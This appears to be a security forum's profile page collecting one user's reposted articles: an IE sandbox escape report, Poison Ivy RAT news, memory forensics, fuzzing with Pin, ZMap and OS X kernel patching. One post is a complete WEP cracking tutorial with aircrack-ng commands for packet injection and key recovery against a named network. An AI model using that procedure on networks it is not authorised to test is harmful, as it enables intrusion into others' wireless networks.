-
Posts
18715 -
Joined
-
Last visited
-
Days Won
701
Everything posted by Nytro
-
[h=1]Cracking WPA2[/h] Andrew Whitaker Cracking WPA2 using Airmon-ng
-
Am mai gasit asta: Image Host | Free web hosting for images with direct linking allowed. Use IMG Host to share pictures with friends or to post images on message boards, your MySpace profile or eBay auction. - Simplu. Daca mai aveti alternative, postati aici, sa avem de unde alege.
-
Test: Cautam un site unde sa pot uploada imagini si sa am si eu link direct, nu ca jegul de tinypic care imi cere si CAPTCHA si care nu imi da link direct. Am gasit asta: http://www.pixentral.com Pentru link direct, click dreapta, copy image location. Simplu si eficient. Muie tinypic. PS: Limitari: - maxim 2 MB - maxim 30 de zile
-
La multi ani ba, ziceai ca dai de baut
-
Jumping Out of IE’s Sandbox With One Click by Dennis Fisher Software vendors often give intentionally vague and boring names to the updates they use to fix security vulnerabilities. The lamer the name, the less attention it may attract from attackers looking to reverse-engineer the patch. There was one patch in Microsoft’s August Patch Tuesday release earlier this month that fit that bill, MS13-059, Cumulative Security Update for Internet Explorer. But hidden inside the big fix was a patch for a vulnerability that enabled a one-click escape of the IE sandbox. The vulnerability was discovered by researcher Fermin J. Serna, a former Microsoft security engineer, and it takes advantage of the way that IE handles some command line options in certain conditions. Serna found that the ElevationPolicy in IE will treat the Microsoft Diagnostic Tool (msdt.exe) as a medium-integrity process if the user requests it to do so. In IE, Protected Mode is the sandbox that is designed to prevent attackers from being able to use one bug in a low-level process to compromise the machine. “Funny thing is that CreateProcess() has a hook inside the LowIL IE process and if you try to CreateProcess(“msdt.exe”) it will get brokered to the IE Medium IL one and applied the Elevation policy there. Some sanitization happens to most of the parameters for security reasons (do not create a Medium IL process where the process token is too unrestricted),” Serna wrote in a blog post explaining the bug. “The vulnerability here is that msdt.exe (that due to its elevation policy will run as medium IL outside of any sandbox) has some interesting command line options. Concretely this one: /path .diagpkg file | .diagcfg file —- Specifies the full path to a diagnostic package. If you specify a directory, the directory must contain a diagnostic package. You cannot use the /path parameter in conjunction with the /id, /dci, or /cab parameter.” Serna said that using the vulnerability, he could cause the msdt.exe process to display some strings that he controls to the user. If the user clicks the continue button on the dialog box, his code will run and he’s escaped the sandbox in the browser. He said that executing the attack would be trivial under the right conditions. “Assuming you have code execution at the sandboxed process though some other bug (let’s say the common use after free problem all browsers suffer) then it is not easy but trivial. This sandbox escape vulnerability is not a memory corruption that can fail but a logical one that does not fail. The only requirement is the attacked user has to click a “continue” button on a dialog with attacker controlled messages. This is the reason for a one click versus a full 0 click where the user does not see anything,” Serna said via email. Sursa: Jumping Out of IE's Sandbox With One Click | Threatpost
-
How to Crack WEP Key With Backtrack 5 [wifi hacking] As announced before we would be writing related to wifi attacks and security, This post is the second part of our series on wifi attacks and Security, In the first part we discussed about various terminologies related to wifi attacks and security and discussed couple of attacks. This post will also show you how one can easily crack WEP keys in no time. Security Issues With WEP WEP (Wired Equivalent Privacy) was proved full of flaws back in 2001, WEP protocol itself has some weakness which allows the attackers to crack them in no time. The biggest flaw probably in a WEP key is that it supports only 40bit encryption which means that there are 16million possibilities only. For more information on WEP flaws, kindly read the WEP flaws section here. Requirements :- Here is what you would require to crack a WEP key: 1. Backtrack or any other Linux distro with aircrack-ng installed 2. A Wifi adapter capable of injecting packets , For this tutorial I will use Alfa AWUS036H which is a very popular card and it performs well with Backtrack You can find compatible wifi card lists here. Procedure :- First Login to your Backtrack / Linux and plug in your Wifi adapter Open a new Console and type in the following commands : ifconfig wlan0 up where wlan0 is the name of the wireless card ,it can be different .To see all wireless cards connected to your system simply type in " iwconfig ". Putting your WiFi Adapter on Monitor Mode To begin, you’ll need to first put your wireless adapter into monitor mode , Monitor mode is the mode whereby your card can listen to every packet in the air , You can put your card into monitor mode by typing in the following commands airmon-ng start (your interface) Example :- airmon-ng start wlan0 Now a new interface mon0 will be created , You can see the new interface is in monitor mode by entering "iwconfig mon0" as shown Finding a suitable Target After putting your card into monitor mode ,we need to find a network that is protected by WEP. You can discover the surrounding networks by entering the following command airodump-ng mon0 Bssid shows the mac address of the AP, CH shows the channel in which AP is broadcasted and Essid shows the name broadcasted by the AP, Cipher shows the encryption type. Now look out for a wep protected network In my case i’ll take “linksys “ as my target for rest of the tutorial Attacking The Target Now to crack the WEP key you'll have to capture the targets data into a file, To do this we use airodump tool again, but with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection, otherwise the wireless card has to alternate between all channels .You can restrict the capture by giving in the following commands airodump-ng mon0 --bssid -c (channel ) -w (file name to save ) As my target is broadcasted in channel 6 and has a bssid "98:fc:11:c9:14:22" ,I give in the following commands and save the captured data as "RHAWEP" airodump-ng mon0 --bssid 98:fc:11:c9:14:22 -c 6 -w RHAWEP Using Aireplay to Speed up the cracking Now you’ll have to capture at least 20,000 data packets to crack WEP .This can be done in two ways, The first one would be a (passive attack ) wait for a client to connect to the AP and then start capturing the data packets but this method is very slow, it can take days or even weeks to capture that many data packets The second method would be an (active attack )this method is fast and only takes minutes to generate and inject that many packets . In an active attack you'll have do a Fake authentication (connect) with the AP ,then you'll have to generate and inject packets. This can be done very easily by entering the following commands aireplay-ng - 1 3 -a (bssid of the target ) (interface) In our case we enter the following commands aireplay-ng -1 3 -a 98:fc:11:c9:14:22 mon0 After doing a fake authentication ,now its time to generate and inject Arp packets . To this you'll have to open a new Konsole simultaneously and type in the following commands aireplay-ng 3 -b (bssid of target) -h ( Mac address of mon0) (interface) In our case we enter aireplay-ng 3 -b 98:fc:11:c9:14:22 -h 00:c0:ca:50:f8:32 mon0 If this step was successful you'll see Lot of data packets in the airodump capture as shown Wait till it reaches 20000 packets , best would be to wait till it reaches around 80,000 to 90,000 packets .Its simple more the packets less the time to crack .Once you’ve captured enough number of packets, close all the process's by clicking the into mark which is there on the terminal Cracking WEP key using Aircrack Now its time crack the WEP key from the captured data, Enter the following commands in a new konsole to crack the WEP key aircrack-ng (name of the file ) In our case we enter aircrack-ng RHAWEP-0.1-cap With in a few minutes Aircrak will crack the WEP key as shown Once the crack is successful you will be left with the KEY! Remove the colons from the output and you’ll have your WEP Key. Hope You Enjoyed this tutorial ,For further Doubts and clarifications please pass your comments Sursa: Learn everything about window,hacking,buy e-gift vouchers
-
Poison Ivy RAT Spotted in Three New Attacks by Michael Mimoso The Poison Ivy remote access Trojan may be old, but it’s not losing favor with nation states that continue to make it the center piece of targeted attacks. Three groups of hackers, reportedly all with ties to China and possibly related in terms of their funding and training, are currently managing campaigns using the RAT to steal data from organizations and monitor individuals’ activities. Researchers at FireEye said the three campaigns target different industries yet share some of the same builder tools, employ passwords written in the same semantic pattern, and use phishing emails in their campaigns that are written in English using a Chinese language keyboard. So much for the notion of targeted, persistent attacks requiring zero-day malware. “There is a noticeable infrastructure built around using this tool; it’s clear they’ve trained a number of people to use and operate it,” said Darien Kindlund, manager of threat intelligence at FireEye. “It’s effective and there’s no need to change their tactics, which is why they’re still using it.” Kindlund said, however, that enterprise security managers and operations teams can become complacent when it comes to Poison Ivy, dismissing it as a crimeware tool and missing its potential to still infect many machines as it moves laterally looking for more vulnerable machines or data it targets. “What’s easy for these threat actors is they’re using easy-to-use tools that are point-and-click and it becomes easy to blend in with crimeware groups, easy to blend into the noise and discount their presence when a defender identifies a Poison Ivy infection,” Kindlund said. “They might remediate a single infected machine rather than think it’s one of 50 compromises and a large-scale infection. That gives the adversary more time to change tactics and move laterally to other systems, making it harder to detect.” Another reason Poison Ivy still finds favor with attackers is that, unlike Gh0stRAT or Dark Comet, it’s difficult to detect when Poison Ivy beacons out to its command and control infrastructure in order to receive more instructions. “Compared to Gh0stRAT, which uses zlib compression to obfuscate communication out, if a network operator sees that traffic beaconing out, it’s easy to decode that traffic to figure out what walked out door,” Kindlund said. “Poison Ivy uses Camellia encryption, which makes it more difficult to figure out what walked out the door.” The three attacks currently are fundamentally familiar. The first, named admin@338 for the password used by the attacker, targets international financial firms that specialize in the analysis of global or country-specific economic policies. It uses malicious email attachments to infect endpoints with Poison Ivy, which then downloads additional malware to steal intelligence in order to monetize insider information to make a market play or for geo-political reasons, Kindlund said. The second attack, named th3bug for its password, spiked last year, FireEye said. It focuses on higher education and international health care and high tech firms in order to steal intellectual property or new research that has yet to be published by a university team. Most of these are watering hole attacks where a regional website frequented by the targets is compromised and exploit code is injected onto the victim’s machine that redirects them to Poison Ivy. The third attack, dubbed menuPass, has been the most active of the three and dates back to 2009, spiking last year. It targets the defense industry and international government agencies trying to steal military intelligence. Spear phishing campaigns include attachments infected with Poison Ivy that are meant to look like a purchase order or price quote that would be fairly specific to the victim, Kindlund said. “They’ve done their homework and looked at the trust relationships of the target—who does this defense contractor do business with—and spoof an email from that partner and send an email through that channel,” Kindlund said. “These three groups have ties back to China; they all use a separate command and control infrastructure, but all three have a backend presence in that country.” Meanwhile, the company is releasing a free tool based on the open source ChopShop kit developed by MITRE Corp. The module is Poison Ivy specific, similar to other modules built for Gh0stRAT and will allow a security or network operations person to decode Poison Ivy traffic. *Poison Ivy image via uwdigitalcollections‘ Flickr photostream, Creative Commons Sursa: Poison Ivy RAT Spotted in Three New China Attacks | Threatpost Old schooleri
-
Frauda
-
http://suport.romtelecom.ro/app/answers/detail/a_id/90/~/cum-pot-apela-1930---v%E3%A2nz%E4%83ri-%E5%9Fi-rela%E5%B3ii-cu-clien%E5%B3ii-din-str%E4%83in%E4%83tate%3F http://www.romtelecom.ro/termeni-legali/termeni-si-conditii-myaccount http://economie.hotnews.ro/stiri-telecom-7174542-cum-ajung-abonatii-romtelecom-clienti-fara-voie-societatii-asigurari-astra.htm
-
Inside the Mind of a Famous Hacker When he was just 15 years old, Michael “MafiaBoy” Calce managed to shut down several major websites including CNN, Dell, Amazon, Yahoo!, eBay, and E-Trade with a series of denial of service attacks. Now, more than a decade later, he talks about how the hacker culture has changed and what users can do to protect themselves. How He Toppled the Web Giants In 2000, Calce targeted CNN.com after another hacker claimed the site would be impossible to bring down because of its “advanced networks” and “huge traffic numbers.” He managed to slow down CNN’s site for nearly two hours . Denial of service attacks involve bombarding a site or application with so many requests that the server is unable to keep up. Calce modified a denial of service attack written by another hacker and trained approximately 200 university networks under his control to a specific target. The attack against Yahoo! was by accident, Calce said. He had put in the IP addresses into the script, and then gone to school, forgetting the script was still running. He came home to find his computer had crashed, and didn’t realize what had happened until he heard the news reports later. Calce’s activities were “illegal, reckless and, in many ways, simply stupid,” he said, adding that he really had not understood the consequences of his actions. “It’s So Easy It’s Scary” More than a decade later, it’s easier to launch attacks now than it was then, Calce said. A lot of the companies are completely unaware that they are at risk, and that needs to change. Back when he was actively targeting sites, you had to work and build your own arsenal of tools before launching an attack. Now there are hacker desktops and ready-to-go tools that anyone can download, install, and go. “If you’re interested and you want to be a hacker, you can be a hacker in 30 minutes,” Calce said. Different Mentality, Motivations Calce and his fellow hackers were driven by curiosity and desire to understand how things worked. That is where the term “hacker” originated, after all. A hacker refers to anybody interested in manipulating technology to do something other than its original purpose. “That’s not necessarily a bad thing,” Calce said. “Everyone at that point in time was running tests and seeing what they could do and what they could infiltrate,” Calce said. The current generation is motivated by money, or desire to destroy. “It’s much more about monetary gain, whereas we were pushing the status quo,” Calce said. And even when there doesn’t seem to be an obvious financial motive, that doesn’t mean it isn’t there. Hacktivist groups such as “Anonymous” and “Lulzsec” are a “different breed,” Calce said. While they have political motivations, some of them do have malicious goals. They are not pure white-hat, or pure black-hat, but more grey-hat hackers Calce said. There will be more hacktivism since people have figured out how to use technology to fight back and draw more attention to their cause. “I don’t condone what they’re doing, but I understand their point,” Calce said. Safe Security Online With attack motivations shifting to monetary gain, the attack focus has also shifted, and individual users are just as likely to be targeted as large companies. Users need to use strong passwords to protect their accounts. They need to be long and complex. Password managers help keep track of strong passwords, Calce said. They should also think about installing personal firewall software on their computers to block malicious traffic. A firewall can also warn you when an application is trying to access the Internet. If you are not using Bluetooth, it should be turned off so that other devices cannot connect to your computer. And finally, users should beware of open wireless networks because it is incredibly easy to eavesdrop on what you are doing, and people don’t realize this, Calce said. Hacking will never go away, and users can take some steps to protect themselves, but ultimately, organizations need to invest in security to protect their end users, Calce said. Sursa: Inside the Mind of a Famous Hacker | ZoneAlarm Security Blog
-
[h=1]Web Framework Vulnerabilties - Abraham Kang[/h] from OWASP AppSec USA PRO 8 months ago not yet rated Title: Web Framework Vulnerabilities Abstract This talk will give participants an opportunity to practically code review Web Application Framework based applications for security vulnerabilities. The material in this talk covers the common vulnerability anti-patterns which show up in applications built on the most popular enterprise web application frameworks (Struts 2, Spring MVC, Ruby on Rails, and .NET MVC). Sample applications are provided with guided tasks to ease participants into understanding the vulnerabilities in each framework and the overall steps a code reviewer should follow to identify these vulnerabilities. This talk is trimmed down version of the 3 hour workshop given at Blackhat. This is an advanced talk and an understand of the application frameworks is a prerequisite to get the most out of this talk. ***** Speaker: Abraham Kang, Principal Security Researcher, HP Fortify Abraham Kang is fascinated with the nuanced details associated with programming languages and their associated APIs in terms of how they affect security. Abraham has a Bachelor of Science from Cornell University. Abraham currently works for HP Fortify as a Principal Security Researcher. Prior to joining Fortify, Abraham worked with application security for over 10 years with the most recent 4 years being a security code reviewer at Wells Fargo. Abraham is focused on application, framework, and mobile security and presented his findings at Blackhat USA, BSIDES, OWASP, Baythreat and HP Protect. ***** Date: Friday October 26, 2012 3:00pm - 3:45pm Location: AppSecUSA, Austin, TX. Hyatt Regency Hotel. Track: Attack Sursa: Web Framework Vulnerabilties - Abraham Kang on Vimeo
-
[h=1]Visualizing Recovered Executables from Memory Images[/h]jessekornblum (jessekornblum) wrote, I like to use a picture to help explain how we can recover executables from memory images. For example, here's the image I was using 2008: This post will explain what's happening in that picture—how PE executables are loaded and recovered—and provide a different visualization of the process. Instead of just a stylized representation, we can produce pictures from actual data. This post explains how to do that and the tools used in the process. When executables are loaded from the disk, Windows uses the PE header to determine how many pages, and with which permissions, will be allocated for each section. The header describes the size and location of each section on the disk and its size and location in memory. Because the sections needs to page aligned in memory, but not on the disk, this generally results in some space being added between the sections when they're loaded into memory. There are also changes made in memory due to relocations and imported functions. When we recover executables from memory, we can use the PE header to map the sections back to their size and locations as they were on the disk. Generally memory forensics tools don't undo the other modifications made by the Windows loader. The changes made in memory remain the new version we recover. In addition, due to paging and other limitations we don't always get all of the pages of the executable from memory. They could have been paged out, are invalid, or were never loaded in the first place. That's a tidy description of the picture above. The reality, of course, is a little messier. I've used my colorize and filecompare tools to produce visualizations for an executable on the disk, what it looked like in memory, and what it looked like when recovered from the memory image. In addition to those tools, I used the Volatility™ memory forensics framework [1] and the Picasion tool for making animated gifs [2]. For the memory image, I'm using the xp-laptop memory image from the NIST CFReDS project [3]. In particular, we'll be looking at cmd.exe, process 3256. Here's a representation of the original executable from the disk as produced with colorize. This image is a little different than some of the others I've posted before. Instead of being vertically oriented, it's horizontal. The data starts at the top left, and then goes down and then right. I've also changed the images to be 512 pixels wide instead of the default 100. I made the image this way to make it appear similar to the image at the start of this post. Here's the command I used to generate the picture: $ colorize -o -w 512 cmd.exe and here's the result: http://jessekornblum.com/tools/colorize/img/cmd.exe.bmp It gets interesting when we compare this picture to the data we can recover from the memory image. First, we can recover the in-memory representation of the executable using the Volatility™ plugin procmemdump. In the files generated by this plugin the pages are memory aligned, not disk aligned. Here's the command line to run the plugin: $ python vol.py -f cases/xp-laptop-2005-07-04-1430.vmem --profile=WinXPSP2x86 procmemdump --pid=3256 --dump-dir=output Volatile Systems Volatility Framework 2.3_alpha Process(V) ImageBase Name Result ---------- ---------- -------------------- ------ 0x8153f480 0x4ad00000 cmd.exe OK: executable.3256.exe Here's how we can colorize it: $ mv executable.3256.exe executable-procmemdump.3256.exe $ colorize -o -w 512 executable-procmemdump.3256.exe Which leads to this result: http://jessekornblum.com/tools/colorize/img/executable-procmemdump.3256.exe.bmp There's a lot going on here, but things will get more clear with a third image. For the third picture we'll recover the executable again, but this time realigning the sections back to how there were on the disk. This is done by parsing the PE header in memory and using it to undo some of the changes made when it was loaded. We can do this using the procexedump plugin, like this: $ python vol.py -f xp-laptop-2005-07-04-1430.vmem --profile=WinXPSP2x86 procexedump --pid=3256 --dump-dir=output Volatile Systems Volatility Framework 2.3_alpha Process(V) ImageBase Name Result ---------- ---------- -------------------- ------ 0x8153f480 0x4ad00000 cmd.exe OK: executable.3256.exe We repeat the process for colorizing this sample: $ mv executable.3256.exe executable-procexedump.3256.exe $ colorize -o -w 512 executable-procexedump.3256.exe Which produces this image: http://jessekornblum.com/tools/colorize/img/executable-procexedump.3256.exe.bmp First, let's compare the recovered executable back to the original. Even before we start our visualizations, we can see there were changes between the original and this version. The MD5 hashes of the two files are different: $ md5deep -b cmd.exe executable-procexedump.3256.exe eeb024f2c81f0d55936fb825d21a91d6 cmd.exe ff8a9a332a9471e1bf8d5cebb941fc66 executable-procexedump.3256.exe Amazingly, however, they match using fuzzy hashing via the ssdeep tool [4]: $ ssdeep -bda cmd.exe executable-procexedump.3256.exe executable-procexedump.3256.exe matches cmd.exe (66) There's also a match with the sdhash similarity detection tool [5]: $ sdhash -g -t 0 cmd.exe executable-procexedump.3256.exe cmd.exe|executable-procexedump.3256.exe|046 (You haven't heard of sdhash? Don't get tunnel vision! There are many similarity detection tools.) Those matches are good signs. But attempting to compare the colorized image of the recovered executable back to the original is a little tricky. To make it easier, I made a kind of blink comparator. The free site Picasion allows you to make animated GIFs from submitted pictures. Combined with some annotations on the pictures, here's the result: There are two important things to notice here. First, we didn't recover all of the executable. The bands of black which appear on the left-hand side in the recovered image are pages which weren't found in memory. Also notice how much of the data from the end of the file is missing, too. Almost all of it! (Isn't it amazing that fuzzy hashing can still generate a match between these two files?) The second thing to notice is the changes in the data. It's a little hard to see in the GIF, but you can get a better view using the filecompare and colorize tools together. We can compare the two files at the byte level and then colorize the result: $ filecompare -b 1 cmd.exe executable-procexedump.3256.exe > orig-to-exe.dat $ colorize -o - w 512 orig-to-exe.dat Here's the result: http://jessekornblum.com/tools/colorize/img/orig-to-exe.dat.bmp Here we can clearly see, in red, the changes throughout the file. The blocks of mostly red, or heavily speckled red, and the places where we weren't able to recover data from the memory image. Because some of the values in the original executable were zeros, those appear to match the zeros we recovered from the memory image--hence the speckled pattern. The changes to the executable you can clearly see a pattern of dashed red lines. Finally, we can visualize the changes between the in-memory representation of the file and the disk representation the file. I've made another animated GIF, this time between these versions of the executable as recovered by procexedump and procmemdump: The most obvious difference between these two pictures is the black band on the left-hand side of the image. That's the space, created by the realignment from disk to memory, being added by the Windows loader to page align the first section of the executable. [h=3]References[/h][1] The Volatility™ framework, https://code.google.com/p/volatility/. Volatility™ is a trademark of Verizon. Jesse Kornblum is not sponsored or approved by, or affiliated with Verizon.[2] Picasion.com, Picasion GIF maker - Create GIF animations online - Make an Animated GIF. [3] The Computer Forensic Reference Data Sets project, National Institute of Standards and Technology, The CFReDS Project. [4] Jesse Kornblum, ssdeep, Fuzzy Hashing and ssdeep. [5] Vassil Roussev, sdhash, http://sdhash.org/. Sursa: jessekornblum: Visualizing Recovered Executables from Memory Images
-
In-Memory fuzzing with Pin by Jonathan Salwan - 2013-08-17 In my previous blog post, I talked about the taint analysis and the pattern matching with Pin. In this short post, I will always talk about Pin, but this time about the In-Memory fuzzing. 1 - In-Memory fuzzing 1.1 - Little introduction In-Memory fuzzing is a technique which consists to target and test a specific basic block, function or portion of a program. To be honest, this technique is not really satisfactory over a large portion of code, this is mainly used for a quick analysis. However it's really straightforward to implement it. For that, we just need to : Choose a targeted piece of code. Set a breakpoint before and after our targeted area. Save the execution context when the first breakpoint occurs. Restore the execution context when the second breakpoint occurs. Catch the SIGSEGV signal. Repeat the operation 3 and 4 until the crash occurs. 1.2 - Little example For a little example, see the following graph. Now, imagine that the user can control the first argument, that means he can control the rdi register in the first basic block and [rbp+var_4] in this stack frame. In this case, we are interested to test the orange basic block. As you can see below, in the orange basic block we have a "mov eax, [rbp+var_4]", that means we can control the eax register. So, we will apply the In-Memory fuzzing technique in this basic block between the "cdqe" and "mov eax, 0" instructions and we will fuzz the eax register. Use the Pin API The Pin API provides all what we need to apply the In-Memory fuzzing technique. To catch the signals, we use the PIN_InterceptSignal() function. This function takes the type of signal and a callback. So, to catch the SIGSEGV signal, in our main function we have something like that: PIN_InterceptSignal(SIGSEGV, catchSignal, 0); Our call back catchSignal, displays just the current context when the signal occurs. Then, because Pin is a DBI framework (Dynamic Binary Instrumentation), we can't set a breakpoint, but that's not really important. With a DBI framework we can control each instruction before and after their execution. So, we will use the PIN_SaveContext() and PIN_ExecuteAt() functions when the first and last targeted instruction occurs. A CONTEXT in Pin, is just the registers state of the processor. That means, when you call PIN_SaveContext(), you save only the state of registers, not the memory. So, to monitor the STORE access, we use the INS_MemoryOperandIsWritten() function. When a STORE occurs, we save the original value and we restore it when the context is restored. That's all, we can see the full source code here. In-Memory fuzzing Pin tool This Pin tool requires three arguments and can take three optional arguments. Required -------- -start <address> The start address of the fuzzing area -end <address> The end address of the fuzzing area -reg <register> The register which will be fuzzed Optional -------- -startValue <value> The start value -maxValue <value> The end value -fuzzingType <"inc" | "random"> Type of fuzzing: incremental or random If we take the above example and that we want to fuzz the orange basic block, we have something like that: $ time pin -t ./InMemoryFuzzing.so -start 0x4005a5 -end 0x4005bb -reg rax -fuzzingType inc \ -startValue 1 -maxValue 0x3000 -- ./test 1 > dump [2] 8472 segmentation fault 0.53s user 0.20s system 99% cpu 0.729 total I used the "time" command to show you how Pin is efficient - I've also redirected stdout in a file called 'dump' because of the output log size (5.5M). At the end of this dump, you can see the context when the SIGSEGV occurs - Current RIP = 0x4005a5 "movzx eax, byte ptr [rax]" with RAX = 0x2420. [Restore Context] [Save Context] [CONTEXT]=---------------------------------------------------------- RAX = 0000000000002420 RBX = 0000000000000000 RCX = 00007fff3134c168 RDX = 00007fff3134abe0 RDI = 0000000000000001 RSI = 00007fff3134abe0 RBP = 00007fff3134abc0 RSP = 00007fff3134abb0 RIP = 00000000004005a5 +------------------------------------------------------------------- +--> 4005a5: cdqe +--> 4005a7: add rax, qword ptr [rbp-0x10] +--> 4005ab: movzx eax, byte ptr [rax] /!\ SIGSEGV received /!\ [SIGSGV]=---------------------------------------------------------- RAX = 00007fff3134d000 RBX = 0000000000000000 RCX = 00007fff3134c168 RDX = 00007fff3134abe0 RDI = 0000000000000001 RSI = 00007fff3134abe0 RBP = 00007fff3134abc0 RSP = 00007fff3134abb0 RIP = 00000000004005ab +------------------------------------------------------------------- You can download this Pin tool here. Sursa: shell-storm | In-Memory fuzzing with Pin
-
ZMap The Internet Scanner v1.0.3 released ZMap is an open-source network scanner that enables researchers to easily perform Internet-wide network studies. With a single machine and a well provisioned network uplink, ZMap is capable of performing a complete scan of the IPv4 address space in under 45 minutes, approaching the theoretical limit of gigabit Ethernet. ZMap can be used to study protocol adoption over time, monitor service availability, and help us better understand large systems distributed across the Internet. ZMap is designed to perform comprehensive scans of the IPv4 address space or large portions of it. While ZMap is a powerful tool for researchers, please keep in mind that by running ZMap, you are potentially scanning the ENTIRE IPv4 address space at over 1.4 million packets per second. Before performing even small scans, we encourage users to contact their local network administrators and consult our list of scanning best practices. By default, ZMap will perform a TCP SYN scan on the specified port at the maximum rate possible. A more conservative configuration that will scan 10,000 random addresses on port 80 at a maximum 10 Mbps can be run as follows: $ zmap --bandwidth=10M --target-port=80 --max-targets=10000 --output-file=results.txt Download: https://zmap.io/download.html
-
Hacking the OS X Kernel for Fun and Profiles Posted on Tuesday, August 13, 2013. My last post described how user-level CPU profilers work, and specifically how Google’s pprof profiler gathers its CPU profiles with the help of the operating system. The specific feature needed from the operating system is the profiling timer provided by setitimer(2) and the SIGPROF signals that it delivers. If the operating system’s implementation of that feature doesn’t work, then the profiler doesn’t work. This post looks at a common bug in Unix implementations of profiling signals and the fix for OS X, applied by editing the OS X kernel binary. If you haven’t read “How to Build a User-Level CPU Profiler,’’ you might want to start there. Unix and Signals and Threads My earlier post referred to profiling programs, without mention of processes or threads. Unix in general and SIGPROF in particular predate the idea of threads. SIGPROF originated in the 4.2BSD release of Berkeley Unix, published in 1983. In Unix at the time, a process was a single thread of execution. Threads did not come easily to Unix. Early implementations were slow and buggy and best avoided. Each of the popular Unix variants added thread support independently, with many shared mistakes. Even before we get to implementation, many of the original Unix APIs are incompatible with the idea of threads. Multithreaded processes allow multiple threads of execution in a single process address space. Unix maintains much per-process state, and the kernel authors must decide whether each piece of state should remain per-process or change to be per-thread. For example, the single process stack must be split into per-thread stacks: it is impossible for independently executing threads to be running on a single stack. Because there are many threads, thread stacks tend to be smaller than the one big process stack that non-threaded Unix programs had. As a result, it can be important to define a separate stack for running signal handlers. That setting is per-thread, for the same reason that ordinary stacks are per-thread. But the choice of handler is per-process. File descriptors are per-process, but then one thread might open a file moments before another thread forks and execs a new program. In order for the open file not to be inherited by the new program, we must introduce a new variant of open(2) that can open a file descriptor atomically marked “close on exec.’’ And not just open: every system call that creates a new file descriptor needs a variant that creates the file descriptor “close on exec.’’ Memory is per-process, so malloc must use a lock to serialize access by independent threads. But again, one thread might acquire the malloc lock moments before another thread forks and execs a new program. The fork makes a new copy of the current process memory, including the locked malloc lock, and that copy will never see the unlock by the thread in the original program. So the child of fork can no longer use malloc without occasional deadlocks. That’s just the tip of the iceberg. There are a lot of changes to make, and it’s easy to miss one. Profiling Signals Here’s a thread-related change that is easy to miss. The goal of the profiling signal is to enable user-level profiling. The signal is sent in response to a program using up a certain amount of CPU time. More specifically, in a multithreaded kernel, the profiling signal is sent when the hardware timer interrupts a thread and the timer interrupt handler finds that the execution of that thread has caused the thread’s process’s profiling timer to expire. In order to profile the code whose execution triggered the timer, the profiling signal must be sent to the thread that is running. If the signal is sent to a thread that is not running, the profile will record idleness such as being blocked on I/O or sleeping as execution and will be neither accurate nor useful. Modern Unix kernels support sending a signal to a process, in which case it can be delivered to an arbitrary thread, or to a specific thread. Kill(2) sends a signal to a process, and pthread_kill(2) sends a signal to a specific thread within a process. Before Unix had threads, the code that delivered a profiling signal looked like psignal(p, SIGPROF), where psignal is a clearer name for the implementation of the kill(2) system call and p is the process with the timer that just expired. If there is just one thread per process, delivering the signal to the process cannot possibly deliver it to the wrong thread. In multithreaded programs, the SIGPROF must be delivered to the running thread: the kernel must call the internal equivalent of pthread_kill(2), not kill(2). FreeBSD and Linux deliver profiling signals correctly. Empirically, NetBSD, OpenBSD, and OS X do not. (Here is a simple C test program.) Without correct delivery of profiling signals, it is impossible to build a correct profiler. OS X Signal Delivery To Apple’s credit, the OS X kernel sources are published and open source, so we can look more closely at the buggy OS X implementation. The profiling signals are delivered by the function bsd_ast in the file kern_sig.c. Here is the relevant bit of code: voidbsd_ast(thread_t thread) { proc_t p = current_proc(); ... if (timerisset(&p->p_vtimer_prof.it_value)) { uint32_t microsecs; task_vtimer_update(p->task, TASK_VTIMER_PROF, µsecs); if (!itimerdecr(p, &p->p_vtimer_prof, microsecs)) { if (timerisset(&p->p_vtimer_prof.it_value)) task_vtimer_set(p->task, TASK_VTIMER_PROF); else task_vtimer_clear(p->task, TASK_VTIMER_PROF); psignal(p, SIGPROF); } } ... } The bsd_ast function is the BSD half of the OS X timer interrupt handler. If profiling is enabled, bsd_ast decrements the timer and sends the signal if the timer expires. The innermost if statement is resetting the the timer state, because setitimer(2) allows both one-shot and periodic timers. As predicted, the code is sending the profiling signal to the process, not to the current thread. There is a function psignal_uthread defined in the same source file that sends a signal instead to a specific thread. One possible fix is very simple: change psignal to psignal_uthread. I filed a report about this bug as Apple Bug Report #9177434 in March 2011, but the bug has persisted in subsequent releases of OS X. In my report, I suggested a different fix, inside the implementation of psignal, but changing psignal to psignal_uthread is even simpler. Let’s do that. Patching the Kernel It should be possible to rebuild the OS X kernel from the released sources. However, I do not know whether the sources are complete, and I do not know what configuration I need to use to recreate the kernel on my machine. I have no confidence that I’d end up with a kernel appropriate for my computer. Since the fix is so simple, it should be possible to just modify the standard OS X kernel binary directly. That binary lives in /mach_kernel on OS X computers. If we run gdb on /mach_kernel we can see the compiled machine code for bsd_ast and find the section we care about. $ gdb /mach_kernel(gdb) disas bsd_astDump of assembler code for function bsd_ast:0xffffff8000568a50 <bsd_ast+0>: push %rbp0xffffff8000568a51 <bsd_ast+1>: mov %rsp,%rbp...if (timerisset(&p->p_vtimer_prof.it_value))0xffffff8000568b7b <bsd_ast+299>: cmpq $0x0,0x1e0(%r15)0xffffff8000568b83 <bsd_ast+307>: jne 0xffffff8000568b8f <bsd_ast+319>0xffffff8000568b85 <bsd_ast+309>: cmpl $0x0,0x1e8(%r15)0xffffff8000568b8d <bsd_ast+317>: je 0xffffff8000568b9f <bsd_ast+335>task_vtimer_set(p->task, TASK_VTIMER_PROF);0xffffff8000568b8f <bsd_ast+319>: mov 0x18(%r15),%rdi0xffffff8000568b93 <bsd_ast+323>: mov $0x2,%esi0xffffff8000568b98 <bsd_ast+328>: callq 0xffffff80002374f0 <task_vtimer_set>0xffffff8000568b9d <bsd_ast+333>: jmp 0xffffff8000568bad <bsd_ast+349>task_vtimer_clear(p->task, TASK_VTIMER_PROF);0xffffff8000568b9f <bsd_ast+335>: mov 0x18(%r15),%rdi0xffffff8000568ba3 <bsd_ast+339>: mov $0x2,%esi0xffffff8000568ba8 <bsd_ast+344>: callq 0xffffff8000237660 <task_vtimer_clear>psignal(p, SIGPROF);0xffffff8000568bad <bsd_ast+349>: mov %r15,%rdi0xffffff8000568bb0 <bsd_ast+352>: xor %esi,%esi0xffffff8000568bb2 <bsd_ast+354>: xor %edx,%edx0xffffff8000568bb4 <bsd_ast+356>: xor %ecx,%ecx0xffffff8000568bb6 <bsd_ast+358>: mov $0x1b,%r8d0xffffff8000568bbc <bsd_ast+364>: callq 0xffffff8000567340 <threadsignal+224>... I’ve annotated the assembly with the corresponding C code in italics. The final sequence is odd. It should be a call to psignal 